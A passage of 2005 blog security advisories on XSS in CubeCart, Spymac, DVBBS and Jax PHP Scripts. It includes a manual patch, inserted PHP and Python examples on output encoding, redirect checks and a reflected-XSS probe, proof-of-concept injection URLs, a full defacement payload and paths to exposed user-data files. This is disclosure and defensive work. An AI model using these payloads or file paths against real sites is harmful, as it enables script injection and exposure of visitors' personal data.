Open: /includes/content/login.inc.php<br />////////<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 55:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />header("Location: ".str_replace("&amp;","&",<br />base64_decode($_GET['redir'])));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />header("Location: ".str_replace("&amp;","&",<br />base64_decode(treatGet($_GET['redir']))));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 74:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$login->assign("VAL_SELF",$_GET['redir']);<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$login->assign("VAL_SELF",treatGet($_GET['redir']));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Save, close and upload this file.<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />///////////////////////////////////////<br />// 3. Open: /includes/boxes/searchForm.inc.php<br />////////<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 40:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$box_content->assign("SEARCHSTR",$_GET['searchStr']);<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$box_content->assign("SEARCHSTR",treatGet($_GET['searchStr']));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Save, close and upload this file.<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />///////////////////////////////////////<br />// 4. 
Open: /includes/content/viewCat.inc.php<br />////////<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 108:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$searchwords = split ( "[ ,]", $_GET['searchStr']);<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$searchwords = split ( "[ ,]", treatGet($_GET['searchStr']));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 308:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$view_cat->assign("TXT_NO_PRODUCTS",$lang['front']['viewCat']['no_products_match']." ".$_GET['searchStr']);<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$view_cat->assign("TXT_NO_PRODUCTS",$lang['front']['viewCat']['no_products_match']." ".treatGet($_GET['searchStr']));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Save, close and upload this file.<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />///////////////////////////////////////<br />// 5. 
Open: /includes/functions.inc.php<br />////////<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />At around line 25 find:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />| functions.inc.php<br />| ========================================<br />| Core Frontend Functions <br />+----------------------------------------------<br />*/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Directly under this add:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />//////////////////////////////////<br />// treat GET vars stop XSS<br />////////<br />function treatGet($text){<br /> <br /> $text = preg_replace("/(\<script)(.*?)(script>)/si", "", "$text");<br /> $text = strip_tags($text);<br /> $text = str_replace(array("'","\"",">","<","\\"), "", $text);<br /> return $text;<br /> <br />}<br /><br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />At around line 384 find:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />function currentPage(){<br /> <br /> $currentPage = $_SERVER['PHP_SELF'];<br /> <br /> if (isset($_SERVER['QUERY_STRING'])) {<br /> <br /> $currentPage .= "?" . htmlentities($_SERVER['QUERY_STRING']);<br /> <br /> }<br /> <br /> return $currentPage;<br /><br />}<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace this with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />function currentPage(){<br /> <br /> $currentPage = $_SERVER['PHP_SELF'];<br /> <br /> if (isset($_SERVER['QUERY_STRING'])) {<br /> <br /> $currentPage .= "?" . htmlentities(treatGet($_SERVER['QUERY_STRING']));<br /> <br /> }<br /> <br /> return $currentPage;<br /><br />}<br /><br />///////////////////////////////////////<br />// 6. 
Open: /includes/ini.inc.php<br />////////<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 108:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$ini['ver'] = '3.0.3';<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$ini['ver'] = '3.0.4';<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Save, close and upload this file.<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />// end of manual fix :O)<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />##################### €nd ########################<br /><br />Thnx to estrella to be my ligth<br />Thnx to all manglers of http://www.osvdb.org<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
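The manual fix above introduces treatGet(), which strips quotes, angle brackets and script tags from every GET value before it is echoed. That approach is lossy (a legitimate search for O'Reilly or for "5 < 6" is silently altered) and it does not address what makes redir dangerous: a base64 value is decoded straight into a Location header. The PHP below is an added example, not CubeCart's code: treatGet() is reproduced from the advisory for comparison, while encodeForHtml() and safeRedirectTarget() are this example's own helpers (their names, the fallback page and the sample values are assumptions). It contrasts stripping with output encoding at the point of use, and shows an allow-list check for the redirect target.

```php
<?php
// Added example, not CubeCart code. treatGet() is copied from the advisory's
// manual fix for comparison; the other functions are this example's own.
declare(strict_types=1);

// The advisory's treatGet(): removes markup characters from the data itself.
function treatGet($text)
{
    $text = preg_replace("/(\<script)(.*?)(script>)/si", "", $text);
    $text = strip_tags($text);
    $text = str_replace(array("'", "\"", ">", "<", "\\"), "", $text);
    return $text;
}

// Output encoding at the point of use: the data is kept intact and the
// browser renders it as text, whatever characters it contains.
function encodeForHtml(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// For the redir parameter: accept only a local absolute path. Full URLs,
// protocol-relative "//host", backslashes and control characters (which
// would split the Location header) all fall back to a fixed page.
function safeRedirectTarget(?string $encoded, string $fallback = '/index.php'): string
{
    if ($encoded === null) {
        return $fallback;
    }
    $decoded = base64_decode($encoded, true);   // strict mode: reject junk characters
    if ($decoded === false) {
        return $fallback;
    }
    $decoded = str_replace('&amp;', '&', $decoded);   // CubeCart stores the URL HTML-escaped
    if (!preg_match('#^/(?![/\\\\])[\x21-\x7E]*$#', $decoded)) {
        return $fallback;
    }
    return $decoded;
}

// Constructed samples: two legitimate inputs and the markup pattern from the advisory.
$samples = [
    "O'Reilly",
    "5 < 6 && 7 > 3",
    '"><script>alert(document.cookie)</script>',
];
foreach ($samples as $s) {
    printf("%-42s | treatGet: %-22s | encoded: %s\n", $s, treatGet($s), encodeForHtml($s));
}

// Constructed redirect values: the first is a local path like the decoded
// redir in the advisory's example; the others must fall back.
$redirects = [
    base64_encode('/cc3/index.php?act=viewDoc&amp;docId=1'),
    base64_encode('//evil.example/'),
    base64_encode("/cc3/index.php\r\nSet-Cookie: x=1"),
    'not base64!',
];
foreach ($redirects as $r) {
    printf("%-60s -> %s\n", $r, safeRedirectTarget($r));
}
```

Run it from the command line to see the three search samples side by side: treatGet() returns the first two with characters missing, while encodeForHtml() returns all three unchanged in meaning but inert as HTML. For the redirect, the allow-list check replaces the advisory's approach of filtering characters out of redir with a decision about what a redirect target is permitted to look like.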
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1127072928034111552005-09-18T12:40:00.000-07:002005-09-24T04:00:31.193-07:00Multiple variable XSS in Spymac Web Os v4.0UPDATE 20 sep 2005 :<br />VERSION AFECTED: Spymac v4 <br /><br />#########################################################<br />Multiple variable XSS in Spymac Web Os v4.0<br />vendor url:http://www.spymac.com/<br />Advisory:http://lostmon.blogspot.com/2005/09/<br />multiple-variable-xss-in-spymac-web-os.html<br />Vendor notified : yes exploit avaible : yes<br />OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=19613" target="BLANK">19613</a><br />Securitytracker:<a href="http://securitytracker.com/id?1014928" target="_BLANK">1014928</a><br />#########################################################<br /><br />Spymac is powered by an integrated collection of applications<br />(developed in-house)that together form "Spymac WOS". 
Spymac<br />WOS is an intelligent environment featuring patent-pending <br />technology that allows for the creation of an immersive and<br />visually-stunning Web experience.<br /><br />Spymac has a flaw that allows a remote cross site scripting attack.<br />This flaw exists because the application does not validate some<br />variables upon submission to some scripts. This could allow a user<br />to create a specially crafted URL that would execute arbitrary<br />code in a user's browser within the trust relationship between the<br />browser and the server, leading to a loss of integrity.<br /><br />############<br />versions affected<br />############<br /><br />Spymac web os v4<br />Spymac Web Os 3.0 beta 190<br /><br />#########<br />Solution<br />#########<br /><br />No solution was available at this time.<br /><br />##########<br />timeline<br />##########<br /><br />Discovered : 17 sep 2005<br />Vendor notify: 17 sep 2005<br />Vendor response:<br />Disclosure :17 sep 2005<br />Public disclosure:17 sep 2005<br /><br /><br />############<br />Examples<br />############<br /><br />http://[victim]/forums/showthread.php?threadid=195681[XSS-CODE]<br /><br />http://[victim]/forums/showthread.php?threadid=195805&postid=3579278[XSS-CODE]#post_3579278<br /><br />http://[victim]/forums/showthread.php?threadid=195605&curr=0[XSS-CODE]<br /><br />########################### €nd ############################<br /><br />Thanks to estrella for being my light.<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1126457491291292092005-09-11T09:46:00.000-07:002005-09-21T09:19:20.033-07:00Spymac Web os 4.0 variable XSS#######################################################<br />Spymac Web os 4.0 variable XSS<br />vendor url:http://www.spymac.com/<br />Advisory:http://lostmon.blogspot.com/2005/09/<br />spymac-web-os-40-variable-xss.html<br />Vendor notified : yes exploit avaible : yes<br />OSVDB ID: <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=19438" target="_BLANK">19438</a><br />Securitytracker:<a href="http://securitytracker.com/id?1014883" target="_BLANK">1014883</a><br />########################################################<br /><br />Spymac is powered by an integrated collection of applications<br />(developed in-house)that together form "Spymac WOS". Spymac<br />WOS is an intelligent environment featuring patent-pending <br />technology that allows for the creation of an immersive and<br />visually-stunning Web experience.<br /><br />Spymac flaw that allows a remote cross site scripting attack.<br />This flaw exists because the application does not validate <br />'category' variable upon submission to 'index.php script.<br />This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br />############<br />version afected <br />############<br /><br />Spymac Web Os 4.0<br /><br />#########<br />Solution<br />#########<br /><br />No solution at this time <br /><br />##########<br />timeline<br />##########<br /><br />Discovered : 10 sep 2005<br />Vendor notify: 10 sep 2005<br />Vendor response: 10 sep 2005<br />Disclosure : 10 sep 2005<br />Public disclosure: 11 sep 2005<br /><br />############<br />Examples<br 
/>############<br /><br />http://[victim]/index.php?category=1%22%3E%3Cbody%3E%3Ch1%3ESe%20busca<br />%20H4x0r%3C/h1%3E%3Cp%3E%20es%20peligroso%20y%20va%20armado%3Cbr%3E%20<br />Lleva%20un%20portatil%20y%20un%20palm%20en%20las%20manos%3Cbr%3E%20si%<br />20le%20ven%20;%20no%20le%20proporcionen%20conexion%20a%20internet.%3C/p<br />%3E%3Cp%3E%3C/p%3E3Cimg20src=http://www.ttvn.com.vn/Uploaded/administrator/<br />hacker.jpg%3E%3Ch1%3EBy%20Lostmon%3C/h1%3E%3C/body%3E<br /><br />############################# €nd ##########################<br /><br />Thanks to estrella for being my light...<br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1123491558755294492005-08-08T01:58:00.000-07:002005-08-22T11:46:55.120-07:00DVBBS Multiple variable Cross site scripting#############################################<br />DVBBS multiple variable cross-site scripting<br />Vendor URL: http://down.dvbbs.net/SoftView/SoftView_2455.html<br />Advisory: http://lostmon.blogspot.com/2005/08/dvbbs-multiple-variable-cross-site.html<br />Vendor notified: yes. Exploit available: yes<br />OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=18512" target="_BLANK">18512</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18679" target="_BLANK">18679</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18680" target="_BLANK">18680</a><br />SecurityTracker: <a href="http://securitytracker.com/id?1014632" target="_BLANK">1014632</a><br />BID: <a href="http://securityfocus.com/bid/14498" target="_BLANK">14498</a><br />Secunia: <a href="http://secunia.com/advisories/16131/" target="_BLANK">SA16131</a><br />#############################################<br /><br />DVBBS contains a flaw that allows a remote cross-site scripting attack. The flaw exists because the application does not validate multiple variables upon submission to multiple scripts (dispbbs.asp, dispuser.asp and boardhelp.asp; see the proof of concept below). This could allow an attacker to craft a URL that, when opened by a victim, executes arbitrary script code in the victim's browser within the trust relationship between the browser and the server, leading to a loss of integrity: the injected script runs with the victim's forum session.<br /><br /><br />############<br />solution<br />############<br /><br />No solution available at this time!<br /><br /><br />############<br />versions<br />############<br /><br />Dvbbs 7.1 SP2<br />Dvbbs 7.1<br /><br />#############<br />timeline<br />#############<br /><br />discovered: 21-jul-2005<br />disclosure: 21-jul-2005<br />public disclosure: 08-aug-2005<br /><br />####################<br />proof of concept<br />####################<br /><br />Replace [XSS-CODE] with a script payload; each URL places it in a different unvalidated parameter.<br /><br />http://[VICTIM]/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE]<br /><br />http://[VICTIM]/dispuser.asp?name=Walltrapass[XSS-CODE]<br /><br />http://[VICTIM]/boardhelp.asp?boardid=0&act=2&title=[XSS-CODE]<br />http://[VICTIM]/boardhelp.asp?boardid=0&view=faq[XSS-CODE]&act=3<br />http://[VICTIM]/boardhelp.asp?boardid=0&view=faq&act=3[XSS-CODE]<br />http://[VICTIM]/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title=<br /><br />######################## €nd ##########################<br /><br />Thanks to Estrella for being my light<br /><br />Sincerely,<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
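The advisory above (and several that follow it on this page) lists one proof-of-concept URL per vulnerable parameter, with [XSS-CODE] as the placeholder. The script below is an added example, not code from the advisory or from DVBBS: it generalises that listing into a reflected-XSS probe that appends a unique canary to every query parameter in turn and reports which parameters come back unencoded. The HTTP client is injected as `fetch`, so the example runs offline against `fake_dispbbs`, a constructed stand-in for dispbbs.asp that echoes 'page' raw and encodes the rest; both the fake page and the host name victim.example are assumptions. To probe a host you are authorised to test, pass a real client (with the session cookie where, as in the @Mail advisory, the target requires a login).

```python
"""Reflected-XSS probe for the 'multiple variable' pattern in the advisory above."""
import secrets
from html import escape
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def make_canary(token: str = "") -> str:
    # Harmless marker. The quote and angle brackets are exactly what an output
    # encoder must neutralise; the hex token keeps it unique per scan.
    return '"><lm' + (token or secrets.token_hex(4)) + '>'


def mutate_params(url: str, canary: str):
    """Yield (parameter, probe_url), appending the canary to one parameter at a time.

    Blank parameters (boardhelp.asp's 'title=') are kept: the advisory lists them
    as injection points too.
    """
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for i, (name, value) in enumerate(params):
        mutated = list(params)
        mutated[i] = (name, value + canary)
        yield name, urlunsplit(parts._replace(query=urlencode(mutated)))


def reflected_unencoded(body: str, canary: str) -> bool:
    # The raw canary in the body means the value was echoed verbatim; a site that
    # encodes output would only contain '&quot;&gt;&lt;lm...&gt;'.
    return canary in body


def scan(url: str, fetch) -> list:
    """Return the names of the parameters of `url` whose canary comes back unencoded."""
    canary = make_canary()
    return [name for name, probe in mutate_params(url, canary)
            if reflected_unencoded(fetch(probe), canary)]


def fake_dispbbs(url: str) -> str:
    """Constructed, hypothetical dispbbs.asp: 'page' is echoed raw, the others encoded."""
    q = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    return ('<input name="boardID" value="' + escape(q.get("boardID", ""), quote=True) + '">'
            '<input name="ID" value="' + escape(q.get("ID", ""), quote=True) + '">'
            '<a href="dispbbs.asp?page=' + q.get("page", "") + '">next</a>')


if __name__ == "__main__":
    # Against a live host: scan(url, lambda u: requests.get(u, cookies=session).text)
    print(scan("http://victim.example/dispbbs.asp?boardID=8&ID=550194&page=1", fake_dispbbs))
```

The probe only detects verbatim reflection into HTML; a parameter that is reflected but HTML-encoded passes, which is the behaviour the DVBBS scripts lack. Because the canary is URL-encoded on the way out and decoded by the server, the check is on what the application writes back, not on what was sent.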
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1123232790441925342005-08-05T01:49:00.000-07:002005-08-08T01:08:27.350-07:00Jax PHP Scripts multiple vulnerabilities############################################<br />Jax PHP Scripts multiple vulnerabilities<br />Vendor URL: http://www.jtr.de/scripting/php/<br />Advisory: http://lostmon.blogspot.com/2005/08/jax-php-scripts-multiple.html<br />Vendor notified: yes. Exploit available: yes<br />OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=18568" target="_BLANK">18568</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18569" target="_BLANK">18569</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18570" target="_BLANK">18570</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18571" target="_BLANK">18571</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18572" target="_BLANK">18572</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18573" target="_BLANK">18573</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18574" target="_BLANK">18574</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18575" target="_BLANK">18575</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18576" target="_BLANK">18576</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18577" target="_BLANK">18577</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18578" target="_BLANK">18578</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18579" target="_BLANK">18579</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18580" target="_BLANK">18580</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18581" target="_BLANK">18581</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18582" target="_BLANK">18582</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18583" target="_BLANK">18583</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18584" target="_BLANK">18584</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18585" target="_BLANK">18585</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=18586" target="_BLANK">18586</a><br />Secunia: <a href="http://secunia.com/advisories/16332/" target="_BLANK">SA16332</a>, <a href="http://secunia.com/advisories/16333/" target="_BLANK">SA16333</a>, <a href="http://secunia.com/advisories/16337/" target="_BLANK">SA16337</a>, <a href="http://secunia.com/advisories/16338/" target="_BLANK">SA16338</a><br />BID: <a href="http://securityfocus.com/bid/14481" target="_BLANK">14481</a><br />#############################################<br /><br /><br />###########<br />summary:<br />###########<br /><br />0- Description.<br />1- Products affected.<br />2- Jax Guestbook report.<br />3- Jax Petitionbook report.<br />4- Jax Newsletter report.<br />5- Jax LinkLists report.<br />6- Jax Calendar report.<br />7- Jax DWT Editor report.<br />8- Timeline<br /><br />###############<br />0- Description<br />###############<br /><br />Jax Scripts is a collection of useful PHP scripts to add to or include in a web site.<br /><br />Jax Guestbook (GPL)* ==> PHP script for running a web guestbook<br /><br />Jax Petitionbook (GPL)* ==> adaptation of Jax Guestbook for running a web petition book<br /><br />Jax Newsletter (GPL)* ==> PHP script for running online mailing lists / newsletters (mailing list manager)<br /><br />Jax LinkLists (GPL)* ==> PHP script for running simple hyperlink lists (hyperlink manager)<br /><br />Jax Calendar (GPL)* ==> PHP script for running a simple web calendar (calendar manager)<br /><br />Jax DWT Editor (GPL)* ==> PHP script for editing HTML files based on Dreamweaver templates (template editor)<br /><br /><br />###################<br />1- Products affected<br />###################<br /><br />Jax Guestbook ==> Cross-site scripting and information disclosure.<br />Jax Petitionbook ==> Cross-site scripting and information disclosure.<br />Jax Newsletter ==> Cross-site scripting and information disclosure.<br />Jax LinkLists ==> Cross-site scripting and information disclosure.<br />Jax Calendar ==> Cross-site scripting.<br />Jax DWT Editor ==> Cross-site scripting.<br /><br />In every XSS URL below, [XSS-CODE] marks the parameter whose value is echoed without encoding. The information-disclosure items are flat data files that the scripts keep inside the web root, so the web server hands them to anyone who requests them by name.<br /><br />##################<br />2- Jax Guestbook<br />##################<br /><br />Cross-site scripting:<br /><br />http://[victim]/guestbook/jax_guestbook.php?page=2&language=english&guestbook_id=0&gmt_ofs=0[XSS-CODE]<br /><br />http://[victim]/jax_guestbook.php?page=2&language=english[XSS-CODE]&guestbook_id=0&gmt_ofs=0<br /><br />http://[victim]/guestbook/jax_guestbook.php?page=2[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0<br /><br />http://[victim]/guestbook/jax_guestbook.php?mailto=9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]<br /><br />Information disclosure (direct request):<br /><br />http://[victim]/guestbook/guestbook // IP addresses of the clients who have signed the guestbook<br /><br />http://[victim]/guestbook/guestbook_ips2block // list of banned IPs<br /><br />http://[victim]/guestbook/ips2block // list of banned IPs<br /><br />http://[victim]/guestbook/formmailer/logfile.csv // IPs and data sent by users via the formmail.php script<br /><br />################<br />versions<br />###############<br /><br />Jax Guestbook v3.1<br />Jax Guestbook v3.31<br /><br />###################<br />3- Jax Petitionbook<br />###################<br /><br />Cross-site scripting:<br /><br />http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]<br /><br />http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0<br /><br />http://[victim]/petitionbook/shrimp_petition.php?page=3[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0<br /><br />Information disclosure (direct request):<br /><br />http://[victim]/petitionbook/formmailer.log // every IP and message that users sent via formmail<br /><br />http://[victim]/petitionbook/ips2block // all banned IPs<br /><br />http://[victim]/petitionbook/petitionbook // IPs of everyone who has signed the petition<br /><br /><br />#################<br />4- Jax Newsletter<br />#################<br /><br />Cross-site scripting:<br /><br />http://[victim]/newsletter/jax_newsletter.php?language=German[XSS-CODE]&ml_id=1<br /><br />http://[victim]/newsletter/sign_in.php?do=sign_in&language=german[XSS-CODE]&ml_id=1&ml_id=1<br /><br />http://[victim]/newsletter/archive.php?language=spanish[XSS-CODE]<br /><br />Information disclosure (direct request):<br /><br />http://[victim]/newsletter/logs/jnl_records // a direct request to this file reveals "email","hash","mail_format","gender","nick","mode","groups","action","time","ip","age","profession","nationality" for every registered user.<br /><br />############<br />versions<br />############<br /><br />Jax Newsletter v2.14<br />Jax Newsletter v2.10<br /><br />#################<br />5- Jax LinkLists<br />#################<br /><br />Cross-site scripting:<br /><br />http://[victim]/linklists/jax_linklists.php?language=English[XSS-CODE]<br /><br />http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]<br /><br />Information disclosure (direct request):<br /><br />http://[victim]/linklists/suggestions.csv // discloses the IP of every client who has suggested a link.<br /><br />#############<br />versions<br />#############<br /><br />Jax LinkLists v1.1<br />Jax LinkLists v1.0<br /><br /><br />#################<br />6- Jax Calendar<br />#################<br /><br />Cross-site scripting (the same show_event URL, with the payload placed in each parameter in turn):<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld<br /><br />http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld[XSS-CODE]<br /><br />http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE] // all variables are affected by XSS flaws<br /><br 